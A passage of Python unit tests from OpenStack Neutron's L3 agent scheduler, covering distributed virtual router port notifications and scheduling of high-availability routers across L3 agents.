self.assertFalse(l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_update_port_without_ip_change(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '1.1.1.1'}],
}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '1.1.1.1'}]}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
self.assertFalse(l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_port_binding_change(self):
self._test__notify_l3_agent_port_binding_change()
def test__notify_l3_agent_port_binding_change_removed_routers(self):
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
self._test__notify_l3_agent_port_binding_change(router_to_remove)
def test__notify_l3_agent_port_binding_change_removed_routers_fip(self):
fip = {'router_id': 'router_id'}
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
self._test__notify_l3_agent_port_binding_change(
router_to_remove, fip,
router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_with_fip(self):
fip = {'router_id': 'router_id'}
self._test__notify_l3_agent_port_binding_change(
None, fip, router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_fip_dvr(self):
fip = {'router_id': 'router_id'}
is_distributed = True
self._test__notify_l3_agent_port_binding_change(
None,
fip, is_distributed,
router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_fip_dvr_rmrt(self):
fip = {'router_id': 'router_id'}
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
is_distributed = True
self._test__notify_l3_agent_port_binding_change(
router_to_remove, fip, is_distributed,
router_id=fip['router_id'])
def test__notify_l3_agent_port_binding_change_fip_dvr_on_rmrt(self):
fip = {'router_id': 'foo_id'}
router_to_remove = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'vm-host1'}]
is_distributed = True
self._test__notify_l3_agent_port_binding_change(
router_to_remove, fip, is_distributed,
router_id=fip['router_id'])
def _test__notify_l3_agent_port_binding_change(self,
routers_to_remove=None,
fip=None,
is_distributed=False,
router_id=None):
source_host = 'vm-host1'
context = self.adminContext
original_port = {
'id': uuidutils.generate_uuid(),
portbindings.HOST_ID: source_host,
'device_owner': DEVICE_OWNER_COMPUTE}
port = {
portbindings.HOST_ID: 'vm-host2',
'device_owner': DEVICE_OWNER_COMPUTE}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
with mock.patch.object(l3plugin, 'get_dvr_routers_to_remove',
return_value=routers_to_remove
if routers_to_remove else []),\
mock.patch.object(l3plugin, '_get_floatingips_by_port_id',
return_value=[fip] if fip else []),\
mock.patch.object(l3_dvr_db, 'is_distributed_router',
return_value=is_distributed):
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
if routers_to_remove:
(l3plugin.l3_rpc_notifier.router_removed_from_agent.
assert_called_once_with(mock.ANY, 'foo_id', source_host))
self.assertEqual(
1,
l3plugin.delete_arp_entry_for_dvr_service_port.call_count)
if fip and is_distributed and not (routers_to_remove and
fip['router_id'] is routers_to_remove[0]['router_id']):
(l3plugin.l3_rpc_notifier.routers_updated_on_host.
assert_called_once_with(mock.ANY, ['router_id'], source_host))
self.assertEqual(
1, l3plugin.update_arp_entry_for_dvr_service_port.call_count)
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
context, port,
dest_host=None, router_id=router_id)
def test__notify_l3_agent_update_port_removing_routers(self):
port_id = 'fake-port'
source_host = 'vm-host'
context = self.adminContext
port = {
'id': port_id,
portbindings.HOST_ID: None,
'device_id': '',
'device_owner': ''}
original_port = {
'id': port_id,
portbindings.HOST_ID: source_host,
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE}
plugin = directory.get_plugin()
l3plugin = mock.Mock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
with mock.patch.object(l3plugin, 'get_dvr_routers_to_remove',
return_value=[{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': source_host}]),\
mock.patch.object(l3plugin, '_get_floatingips_by_port_id',
return_value=[]):
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, plugin,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
resource_id=port_id,
states=(original_port, port,)))
self.assertEqual(
1, l3plugin.delete_arp_entry_for_dvr_service_port.call_count)
l3plugin.delete_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext, mock.ANY)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
(l3plugin.l3_rpc_notifier.router_removed_from_agent.
assert_called_once_with(mock.ANY, 'foo_id', source_host))
def test__notify_port_delete(self):
plugin = directory.get_plugin()
l3plugin = mock.Mock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
port = {
'id': uuidutils.generate_uuid(),
'device_id': 'abcd',
'device_owner': DEVICE_OWNER_COMPUTE_NOVA,
portbindings.HOST_ID: 'host1',
}
removed_routers = [{'agent_id': 'foo_agent',
'router_id': 'foo_id',
'host': 'foo_host'}]
l3plugin.get_dvr_routers_to_remove.return_value = removed_routers
l3_dvrscheduler_db._notify_port_delete(
'port', 'after_delete', plugin,
payload=events.DBEventPayload(
self.adminContext,
metadata={'removed_routers': removed_routers},
states=(port,)))
l3plugin.delete_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext, mock.ANY)
(l3plugin.l3_rpc_notifier.router_removed_from_agent.
assert_called_once_with(mock.ANY, 'foo_id', 'foo_host'))
def test_dvr_handle_new_service_port(self):
port = {
'id': 'port1',
'device_id': 'abcd',
'device_owner': DEVICE_OWNER_COMPUTE_NOVA,
portbindings.HOST_ID: 'host1',
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.3'
}
]
}
dvr_ports = [
{
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
},
{
'id': 'dvr_port2',
'device_id': 'r2',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.123'
}
]
}
]
agent_on_host = {'id': 'agent1'}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
return_value=dvr_ports),\
mock.patch('neutron.api.rpc.agentnotifiers.l3_rpc_agent_api'
'.L3AgentNotifyAPI'),\
mock.patch.object(
self.dut, 'get_l3_agents',
return_value=[agent_on_host]) as get_l3_agents:
self.dut.dvr_handle_new_service_port(
self.adminContext, port)
get_l3_agents.assert_called_once_with(
self.adminContext,
filters={'host': [port[portbindings.HOST_ID]]})
self.dut.l3_rpc_notifier.routers_updated_on_host.\
assert_called_once_with(self.adminContext,
{'r1', 'r2'}, 'host1')
self.assertFalse(self.dut.l3_rpc_notifier.routers_updated.called)
def test_get_dvr_routers_by_subnet_ids(self):
subnet_id = '80947d4a-fbc8-484b-9f92-623a6bfcf3e0'
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': subnet_id,
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_port',
return_value=dvr_port),\
mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
'.get_ports', return_value=[dvr_port]):
router_id = self.dut.get_dvr_routers_by_subnet_ids(
self.adminContext, [subnet_id])
self.assertEqual(r1['id'], router_id.pop())
def test_get_subnet_ids_on_router(self):
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': [
{
'subnet_id': '80947d4a-fbc8-484b-9f92-623a6bfcf3e0',
'ip_address': '10.10.10.1'
}
]
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2' '.get_ports',
return_value=[dvr_port]):
sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
r1['id'])
self.assertEqual(sub_ids.pop(),
dvr_port.get('fixed_ips').pop(0).get('subnet_id'))
def test_get_subnet_ids_on_router_no_subnet(self):
dvr_port = {
'id': 'dvr_port1',
'device_id': 'r1',
'device_owner': constants.DEVICE_OWNER_DVR_INTERFACE,
'fixed_ips': []
}
r1 = {
'id': 'r1',
'distributed': True,
}
with mock.patch.object(db_v2.NeutronDbPluginV2, 'get_ports',
return_value=[dvr_port]):
sub_ids = self.dut.get_subnet_ids_on_router(self.adminContext,
r1['id'])
self.assertEqual(0, len(sub_ids))
def test__check_dvr_serviceable_ports_on_host(self):
# HOST_DVR = 'my_l3_host_dvr'
# HOST_DVR_SNAT = 'my_l3_host_dvr_snat'
# HOST_DVR is a sub-string of HOST_DVR_SNAT
self._register_l3_dvr_agents()
host_args = {'admin_state_up': True,
portbindings.PROFILE: {'migrating to': HOST_DVR_SNAT}}
with self.network() as network:
with self.subnet(network=network) as subnet:
subnet_ids = []
subnet_ids.append(subnet['subnet']['id'])
with self.port(subnet=subnet,
is_admin=True,
device_owner=DEVICE_OWNER_COMPUTE,
arg_list=('admin_state_up',
portbindings.PROFILE,), **host_args):
# Check DVR serviceable ports on HOST_DVR_SNAT.
# Should find existence since it is an exact match to the
# target host name of the port binding profile.
result0 = self.l3plugin. \
_check_dvr_serviceable_ports_on_host(self.adminContext,
self.l3_dvr_snat_agent['host'], subnet_ids)
# Check DVR serviceable ports on HOST_DVR.
# Should not find existence since the sub-string won't get
# matched with the target host.
result1 = self.l3plugin. \
_check_dvr_serviceable_ports_on_host(self.adminContext,
self.l3_dvr_agent['host'], subnet_ids)
self.assertTrue(result0)
self.assertFalse(result1)
def _prepare_schedule_snat_tests(self):
agent = agent_obj.Agent(mock.ANY, id=uuidutils.generate_uuid())
agent.admin_state_up = True
agent.heartbeat_timestamp = timeutils.utcnow()
router = {
'id': 'foo_router_id',
'distributed': True,
'external_gateway_info': {
'network_id': uuidutils.generate_uuid(),
'enable_snat': True
}
}
return agent, router
class L3HAPlugin(db_v2.NeutronDbPluginV2,
l3_hamode_db.L3_HA_NAT_db_mixin,
l3_hascheduler_db.L3_HA_scheduler_db_mixin):
supported_extension_aliases = [l3_ext_ha_mode.ALIAS,
router_availability_zone.ALIAS]
@classmethod
def get_plugin_type(cls):
return plugin_constants.L3
def get_plugin_description(self):
return "L3 Routing Service Plugin for testing"
class L3HATestCaseMixin(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
def setUp(self):
super(L3HATestCaseMixin, self).setUp()
self.adminContext = n_context.get_admin_context()
mock.patch.object(n_rpc, 'get_client').start()
self.setup_coreplugin('ml2', load_plugins=False)
cfg.CONF.set_override('service_plugins',
['neutron.tests.unit.scheduler.'
'test_l3_agent_scheduler.L3HAPlugin'])
cfg.CONF.set_override('max_l3_agents_per_router', 0)
manager.init()
self.plugin = directory.get_plugin(plugin_constants.L3)
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
)
self._register_l3_agents()
make_res = mock.patch.object(quota.QuotaEngine, 'make_reservation')
self.mock_make_res = make_res.start()
commit_res = mock.patch.object(quota.QuotaEngine, 'commit_reservation')
self.mock_quota_commit_res = commit_res.start()
# Extend network HA extension.
rname = network_ha.COLLECTION_NAME
attributes.RESOURCES[rname].update(
network_ha.RESOURCE_ATTRIBUTE_MAP[rname])
@staticmethod
def get_router_l3_agent_binding(context, router_id, l3_agent_id=None,
binding_index=None):
args = {'router_id': router_id}
if l3_agent_id:
args['l3_agent_id'] = l3_agent_id
if binding_index:
args['binding_index'] = binding_index
return rb_obj.RouterL3AgentBinding.get_objects(context, **args)
def _create_ha_router(self, ha=True, tenant_id='tenant1', az_hints=None):
self.adminContext.tenant_id = tenant_id
router = {'name': 'router1', 'admin_state_up': True,
'tenant_id': tenant_id}
if ha is not None:
router['ha'] = ha
if az_hints is None:
az_hints = []
router['availability_zone_hints'] = az_hints
return self.plugin.create_router(self.adminContext,
{'router': router})
def test_create_ha_port_and_bind_catch_integrity_error(self):
router = self._create_ha_router(tenant_id='foo_tenant')
self.plugin.schedule_router(self.adminContext, router['id'])
agent = {'id': 'foo_agent'}
orig_fn = orm.Session.add
def db_ref_err_for_add_haportbinding(s, instance):
if instance.__class__.__name__ == 'L3HARouterAgentPortBinding':
instance.router_id = 'nonexistent_router'
return orig_fn(s, instance)
with mock.patch.object(self.plugin.router_scheduler, 'bind_router'):
with mock.patch.object(
orm.Session, 'add',
side_effect=db_ref_err_for_add_haportbinding,
autospec=True):
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext,
router['id'], router['tenant_id'], agent)
def test_create_ha_port_and_bind_wont_create_redundant_ports(self):
# When migrating from HA to DVR+HA router, create_ha_port_and_bind
# should create only one network:router_ha_interface port on a router
# when binding to same agent. So we need only one agent for testing
# (preferably with dvr_snat mode).
agent_obj.Agent.update_objects(
self.adminContext, {'admin_state_up': False})
l3_dvr_snat_agent = helpers.register_l3_agent(
'fake_l3_host_dvr_snat', constants.L3_AGENT_MODE_DVR_SNAT)
router = self._create_ha_router(tenant_id='foo_tenant')
self.plugin.schedule_router(self.adminContext, router['id'])
router['admin_state_up'] = False
updated_router1 = self.plugin.update_router(
self.adminContext, router['id'], {'router': router})
updated_router1['distributed'] = True
self.plugin.update_router(
self.adminContext, router['id'], {'router': updated_router1})
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext, router['id'],
router['tenant_id'], l3_dvr_snat_agent)
filters = {'device_owner': ['network:router_ha_interface'],
'device_id': [router['id']]}
self.core_plugin = directory.get_plugin()
ports = self.core_plugin.get_ports(
self.adminContext, filters=filters)
self.assertEqual(1, len(ports))
def test_create_ha_port_and_bind_catch_router_not_found(self):
router = self._create_ha_router(tenant_id='foo_tenant')
self.plugin.schedule_router(self.adminContext, router['id'])
agent = {'id': 'foo_agent'}
with mock.patch.object(self.plugin.router_scheduler, 'bind_router'):
with mock.patch.object(
self.plugin, 'add_ha_port',
side_effect=l3_exc.RouterNotFound(
router_id='foo_router')),\
mock.patch.object(
self.plugin, 'safe_delete_ha_network') as sd_ha_net:
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext,
router['id'], router['tenant_id'], agent)
self.assertTrue(sd_ha_net.called)
def test_create_ha_port_and_bind_bind_router_returns_None(self):
router = self._create_ha_router(tenant_id='foo_tenant')
agent = {'id': 'foo_agent'}
with mock.patch.object(self.plugin.router_scheduler, 'bind_router',
return_value=None):
with mock.patch.object(self.plugin, 'add_ha_port') as add_ha_port:
self.plugin.router_scheduler.create_ha_port_and_bind(
self.plugin, self.adminContext,
router['id'], router['tenant_id'], agent)
self.assertFalse(add_ha_port.called)
class VacantBindingIndexTestCase(L3HATestCaseMixin):
"""Test various scenarios for get_vacant_binding_index().
binding_index
The binding_index we want to delete/unschedule.
is_manual_scheduling
Whether or not this is a scheduling requested by the user
(`neutron l3-agent-router-add`) or by some worker (scheduler or RPC
from agent). If this is a manual scheduling we should always
comply.
"""
binding_scenarios = [
('Delete first binding_index',
dict(binding_index=1)),
('Delete middle binding_index',
dict(binding_index=2)),
('Delete last binding_index',
dict(binding_index=3)),
('Do not remove any bindings',
dict(binding_index=None)),
]
manual_scheduling_scenarios = [
('with manual scheduling',
dict(is_manual_scheduling=True)),
('without manual scheduling',
dict(is_manual_scheduling=False)),
]
scenarios = testscenarios.multiply_scenarios(
binding_scenarios, manual_scheduling_scenarios)
def test_get_vacant_binding_index(self):
helpers.register_l3_agent('host_3')
cfg.CONF.set_override('max_l3_agents_per_router', 3)
router = self._create_ha_router()
if self.binding_index:
bindings = self.get_router_l3_agent_binding(
self.adminContext, router['id'],
binding_index=self.binding_index)
self.assertEqual(1, len(bindings))
bindings[0].delete()
vacant_binding_index = self.plugin.get_vacant_binding_index(
self.adminContext, router['id'], self.is_manual_scheduling)
if self.binding_index:
self.assertEqual(self.binding_index, vacant_binding_index)
else:
if self.is_manual_scheduling:
# If this is a manual scheduling, the user requested the
# binding so we should always provide a new one.
self.assertEqual(cfg.CONF.max_l3_agents_per_router + 1,
vacant_binding_index)
else:
# Else, we already have 3 so -1 is the 'error' value.
self.assertEqual(-1, vacant_binding_index)
class L3_HA_scheduler_db_mixinTestCase(L3HATestCaseMixin):
def _register_l3_agents(self, plugin=None):
super(L3_HA_scheduler_db_mixinTestCase,
self)._register_l3_agents(plugin=plugin)
self.agent3 = helpers.register_l3_agent(host='host_3')
self.agent_id3 = self.agent3.id
self.agent4 = helpers.register_l3_agent(host='host_4')
self.agent_id4 = self.agent4.id
def test_get_routers_l3_agents_count(self):
router1 = self._create_ha_router()
cfg.CONF.set_override('max_l3_agents_per_router', 2)
router2 = self._create_ha_router()
router3 = self._create_ha_router(ha=False)
result = self.plugin.get_routers_l3_agents_count(self.adminContext)
result += self.plugin.get_routers_l3_agents_count(
self.adminContext, ha=True)
self.assertEqual(3, len(result))
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router1['id'], 4), check_result)
self.assertIn((router2['id'], 2), check_result)
self.assertIn((router3['id'], 0), check_result)
result = self.plugin.get_routers_l3_agents_count(self.adminContext,
ha=True, less_than=3)
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router2['id'], 2), check_result)
def test_get_routers_not_ha_l3_agents_count(self):
router1 = self._create_ha_router(ha=False)
router2 = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, router1['id'],
candidates=[self.agent1])
result = self.plugin.get_routers_l3_agents_count(self.adminContext)
self.assertEqual(2, len(result))
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router1['id'], 1), check_result)
self.assertIn((router2['id'], 0), check_result)
result = self.plugin.get_routers_l3_agents_count(self.adminContext,
less_than=1)
check_result = [(router['id'], agents) for router, agents in result]
self.assertIn((router2['id'], 0), check_result)
self.assertNotIn((router1['id'], 1), check_result)
def test_get_ordered_l3_agents_by_num_routers(self):
# Mock scheduling so that the test can control it explicitly
mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
'_notify_router_updated').start()
with mock.patch.object(self.plugin, 'schedule_router'):
router1 = self._create_ha_router()
router2 = self._create_ha_router()
router3 = self._create_ha_router(ha=False)
router4 = self._create_ha_router(ha=False)
# Agent 1 will host 0 routers, agent 2 will host 1, agent 3 will
# host 2, and agent 4 will host 3.
self.plugin.schedule_router(self.adminContext, router1['id'],
candidates=[self.agent2, self.agent4])
self.plugin.schedule_router(self.adminContext, router2['id'],
candidates=[self.agent3, self.agent4])
self.plugin.schedule_router(self.adminContext, router3['id'],
candidates=[self.agent3])
self.plugin.schedule_router(self.adminContext, router4['id'],
candidates=[self.agent4])
agent_ids = [self.agent_id1, self.agent_id2, self.agent_id3,
self.agent_id4]
result = self.plugin.get_l3_agents_ordered_by_num_routers(
self.adminContext, agent_ids)
self.assertEqual(agent_ids, [record['id'] for record in result])
class L3AgentSchedulerDbMixinTestCase(L3HATestCaseMixin):
def _setup_ha_router(self):
router = self._create_ha_router()
agents = self._get_agents_scheduled_for_router(router)
return router, agents
def test_reschedule_ha_routers_from_down_agents(self):
agents = self._setup_ha_router()[1]
self.assertEqual(2, len(agents))
self._set_l3_agent_dead(self.agent_id1)
with mock.patch.object(self.plugin, 'reschedule_router') as reschedule:
self.plugin.reschedule_routers_from_down_agents()
self.assertFalse(reschedule.called)
def test_list_l3_agents_hosting_ha_router(self):
router = self._create_ha_router()
agents = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents']
for agent in agents:
self.assertEqual('standby', agent['ha_state'])
self.plugin.update_routers_states(
self.adminContext, {router['id']: 'active'}, self.agent1.host)
agents = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents']
for agent in agents:
expected_state = ('active' if agent['host'] == self.agent1.host
else 'standby')
self.assertEqual(expected_state, agent['ha_state'])
def test_list_l3_agents_hosting_legacy_router(self):
router = self._create_ha_router(ha=False)
self.plugin.schedule_router(self.adminContext, router['id'])
agent = self.plugin.list_l3_agents_hosting_router(
self.adminContext, router['id'])['agents'][0]
self.assertIsNone(agent['ha_state'])
def test_get_agents_dict_for_router_unscheduled_returns_empty_list(self):
self.assertEqual({'agents': []},
self.plugin._get_agents_dict_for_router([]))
def test_router_doesnt_support_scheduling(self):
with mock.patch.object(self.plugin, 'router_supports_scheduling',
return_value=False):
agent = helpers.register_l3_agent(host='myhost_3')
with testtools.ExpectedException(
l3agent.RouterDoesntSupportScheduling):
self.plugin.add_router_to_l3_agent(
self.adminContext, agent.id, 'router_id')
def test_manual_add_ha_router_to_agent(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
router, agents = self._setup_ha_router()
self.assertEqual(2, len(agents))
agent = helpers.register_l3_agent(host='myhost_3')
# We allow to exceed max l3 agents per router via manual scheduling
self.plugin.add_router_to_l3_agent(
self.adminContext, agent.id, router['id'])
agents = self._get_agents_scheduled_for_router(router)
self.assertIn(agent.id, [_agent.id for _agent in agents])
self.assertEqual(3, len(agents))
def test_manual_remove_ha_router_from_agent(self):
router, agents = self._setup_ha_router()
self.assertEqual(2, len(agents))
agent = agents.pop()
# Remove router from agent and make sure it is removed
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
agents = self._get_agents_scheduled_for_router(router)
self.assertEqual(1, len(agents))
self.assertNotIn(agent.id, [_agent.id for _agent in agents])
def test_manual_remove_ha_router_from_all_agents(self):
router, agents = self._setup_ha_router()
self.assertEqual(2, len(agents))
agent = agents.pop()
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
agent = agents.pop()
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
agents = self._get_agents_scheduled_for_router(router)
self.assertEqual(0, len(agents))
def _get_agents_scheduled_for_router(self, router):
return self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
def test_delete_ha_interfaces_from_agent(self):
router, agents = self._setup_ha_router()
agent = agents.pop()
self.plugin.remove_router_from_l3_agent(
self.adminContext, agent.id, router['id'])
objs = l3_hamode.L3HARouterAgentPortBinding.get_objects(
self.adminContext, router_id=router['id'])
results = [binding.l3_agent_id for binding in objs]
self.assertNotIn(agent.id, results)
def test_add_ha_interface_to_l3_agent(self):
agent = self.plugin.get_agent_objects(self.adminContext)[0]
router = self._create_ha_router()
self.plugin.add_router_to_l3_agent(self.adminContext, agent.id,
router['id'])
# Verify agent has HA interface
ha_ports = self.plugin.get_ha_router_port_bindings(self.adminContext,
[router['id']])
self.assertIn(agent.id, [ha_port.l3_agent_id for ha_port in ha_ports])
def test_schedule_routers_unique_binding_indices(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
router = self._create_ha_router()
bindings = self.get_router_l3_agent_binding(self.adminContext,
router['id'])
binding_indices = [binding.binding_index for binding in bindings]
self.assertEqual(list(range(1, cfg.CONF.max_l3_agents_per_router + 1)),
binding_indices)
def test_bind_router_twice_for_non_ha(self):
router = self._create_ha_router(ha=False)
self.plugin.router_scheduler.bind_router(self.plugin,
self.adminContext,
router['id'],
self.agent_id1)
self.plugin.router_scheduler.bind_router(self.plugin,
self.adminContext,
router['id'],
self.agent_id2)
# Make sure the second bind_router call didn't schedule the router to
# more agents than allowed.
agents = self.plugin.get_l3_agents_hosting_routers(self.adminContext,
[router['id']])
self.assertEqual(1, len(agents))
# Moreover, make sure that the agent that did get bound, only got bound
# once.
bindings = self.get_router_l3_agent_binding(
self.adminContext, router['id'], l3_agent_id=agents[0]['id'])
self.assertEqual(1, len(bindings))
class L3HAChanceSchedulerTestCase(L3HATestCaseMixin):
def test_scheduler_with_ha_enabled(self):
router = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
for agent in agents:
sync_data = self.plugin.get_ha_sync_data_for_host(
self.adminContext, router_ids=[router['id']],
host=agent.host, agent=agent)
self.assertEqual(1, len(sync_data))
interface = sync_data[0][constants.HA_INTERFACE_KEY]
self.assertIsNotNone(interface)
def test_auto_schedule(self):
# Mock scheduling so that the test can control it explicitly
mock.patch.object(l3_hamode_db.L3_HA_NAT_db_mixin,
'_notify_router_updated').start()
router = self._create_ha_router()
self.plugin.auto_schedule_routers(self.adminContext, self.agent1.host)
self.plugin.auto_schedule_routers(self.adminContext, self.agent2.host)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']])
self.assertEqual(2, len(agents))
def test_auto_schedule_specific_router_when_agent_added(self):
self._auto_schedule_when_agent_added(True)
def test_auto_schedule_all_routers_when_agent_added(self):
self._auto_schedule_when_agent_added(False)
def test_auto_schedule_ha_router_when_incompatible_agent_exist(self):
handle_internal_only_routers_agent = helpers.register_l3_agent(
'host_3', constants.L3_AGENT_MODE_LEGACY, internal_only=False)
router = self._create_ha_router()
self.plugin.auto_schedule_routers(
self.adminContext, handle_internal_only_routers_agent.host)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
agent_ids = [agent['id'] for agent in agents]
self.assertEqual(2, len(agents))
self.assertNotIn(handle_internal_only_routers_agent.id, agent_ids)
def test_auto_schedule_ha_router_when_dvr_agent_exist(self):
dvr_agent = helpers.register_l3_agent(
HOST_DVR, constants.L3_AGENT_MODE_DVR)
router = self._create_ha_router()
self.plugin.auto_schedule_routers(self.adminContext, dvr_agent.host)
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
agent_ids = [agent['id'] for agent in agents]
self.assertEqual(2, len(agents))
self.assertNotIn(dvr_agent.id, agent_ids)
def _auto_schedule_when_agent_added(self, specific_router):
router = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id1, agent_ids)
self.assertIn(self.agent_id2, agent_ids)
agent = helpers.register_l3_agent(host='host_3')
self.agent_id3 = agent.id
self.plugin.auto_schedule_routers(self.adminContext, 'host_3')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [router['id']],
admin_state_up=True)
self.assertEqual(3, len(agents))
# Simulate agent restart to make sure we don't try to re-bind
self.plugin.auto_schedule_routers(self.adminContext, 'host_3')
class L3HALeastRoutersSchedulerTestCase(L3HATestCaseMixin):
def _register_l3_agents(self, plugin=None):
super(L3HALeastRoutersSchedulerTestCase,
self)._register_l3_agents(plugin=plugin)
agent = helpers.register_l3_agent(host='host_3')
self.agent_id3 = agent.id
agent = helpers.register_l3_agent(host='host_4')
self.agent_id4 = agent.id
def setUp(self):
super(L3HALeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
)
def test_scheduler(self):
cfg.CONF.set_override('max_l3_agents_per_router', 2)
# disable the third agent to be sure that the router will
# be scheduled of the two firsts
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id3, False)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id4, False)
r1 = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id1, agent_ids)
self.assertIn(self.agent_id2, agent_ids)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id3, True)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id4, True)
r2 = self._create_ha_router()
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['id']],
admin_state_up=True)
self.assertEqual(2, len(agents))
agent_ids = [agent['id'] for agent in agents]
self.assertIn(self.agent_id3, agent_ids)
self.assertIn(self.agent_id4, agent_ids)
class TestGetL3AgentsWithFilter(testlib_api.SqlTestCase,
L3SchedulerBaseMixin):
"""Test cases to test get_l3_agents.
6 l3 agents are registered in the order - legacy, dvr_snat, dvr,
dvr_no_external, fake_mode and legacy
"""
scenarios = [
('no filter',
dict(agent_modes=[],
host=['host_1'],
expected_agent_modes=['legacy', 'dvr_snat', 'dvr',
'dvr_no_external', 'fake_mode',
'legacy'],
expected_host=['host_1'])),
('legacy',
dict(agent_modes=['legacy'],
host=['host_1'],
expected_agent_modes=['legacy', 'legacy'],
expected_host=['host_1'])),
('dvr_snat',
dict(agent_modes=['dvr_snat'],
host=['host_2'],
expected_agent_modes=['dvr_snat'],
